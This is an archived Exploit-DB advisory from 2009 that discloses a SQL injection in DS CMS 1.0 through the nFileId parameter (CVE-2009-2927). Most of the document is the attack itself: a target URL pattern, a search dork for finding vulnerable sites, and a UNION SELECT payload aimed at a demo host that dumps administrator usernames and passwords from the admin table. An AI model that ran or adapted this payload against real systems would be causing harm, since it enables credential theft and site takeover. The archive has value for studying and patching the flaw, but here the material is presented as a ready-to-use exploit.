DS CMS 1.0 nFileId Remote SQL Injection Vulnerability

2009-08-14T00:00:00
ID EDB-ID:9440
Type exploitdb
Reporter Mr.tro0oqy
Modified 2009-08-14T00:00:00

Description

DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability. CVE-2009-2927. Webapps exploit for php platform

                                        
                                            =======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability

[+] Script site : http://cms.dsinternal.com/Home 

[+] D0rk : Copyright © DigitalSpinners, 2009.

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/DetailFile.php?nFileId=[SQL]


Demo:
-----
http://www.cmsdemo.dsinternal.com/DetailFile.php?nFileId=-40+union+select+1,2,3,group_concat%28UserPass,0x3a,UserName%29,5,6+from+admin_user_info--
-----

# milw0rm.com [2009-08-14]